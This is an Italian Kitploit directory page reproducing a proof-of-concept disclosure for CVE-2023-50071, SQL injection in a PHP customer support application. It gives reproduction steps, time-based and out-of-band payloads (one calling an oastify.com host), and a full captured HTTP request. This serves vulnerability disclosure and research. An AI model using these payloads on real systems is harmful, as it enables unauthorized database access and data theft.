Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-50071 — Multiple vulnerabilità di SQL injection in /customer_support/ajax.php?action=save_department in Customer Support System 1.0 consentono a attaccanti autenticati di eseguire comandi SQL arbitrari tramite id o nome. | Kitploit
Strumenti/GitHubGitHub/geraldoalcantara/cve-2023-50071
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingSicurezza dei Database
GitHubgeraldoalcantara/cve-2023-50071

CVE-2023-50071

Multiple vulnerabilità di SQL injection in /customer_support/ajax.php?action=save_department in Customer Support System 1.0 consentono a attaccanti autenticati di eseguire comandi SQL arbitrari tramite id o nome.

Vedi Repository
322 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-50071

Sistema di Supporto Clienti 1.0 - Multiple vulnerabilità di SQL injection - save_department

Descrizione: Multiple vulnerabilità di SQL injection in /customer_support/ajax.php?action=save_department nel Sistema di Supporto Clienti 1.0 permettono a attaccanti autenticati di eseguire comandi SQL arbitrari tramite id o name.

Versione del Prodotto Vulnerabile: Sistema di Supporto Clienti 1.0
Autore CVE: Geraldo Alcantara
Data: 29/11/2023
CVE: CVE-2023-50071
Link CVE: https://www.cve.org/CVERecord?id=CVE-2023-50071
Link NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-50071
Link Tenable: https://www.tenable.com/cve/CVE-2023-50071
Confermato il: 15/12/2023
Testato su: Windows

Passaggi per riprodurre:

1- Esegui l'accesso all'applicazione.
2- Naviga alla pagina /customer_support/index.php?page=department_list.
3- Crea o modifica un dipartimento e inserisci un payload malevolo in uno dei seguenti parametri: id o name.
Payloads:
id: (select load_file('\\c7kwr16trd54p693ve9xjbaao1usii67.oastify.com\test')) name: '+(select*from(select(sleep(20)))a)+'


root@kitploit:~
POST /customer_support/ajax.php?action=save_department HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------279004446431847057031125356738
Content-Length: 444
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=department_list
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l

-----------------------------279004446431847057031125356738
Content-Disposition: form-data; name="id"


-----------------------------279004446431847057031125356738
Content-Disposition: form-data; name="name"

test'+(select*from(select(sleep(20)))a)+'
-----------------------------279004446431847057031125356738
Content-Disposition: form-data; name="description"

Teste
-----------------------------279004446431847057031125356738--

Scopritore(i)/Crediti:
Geraldo Alcantara

Scarica lo strumento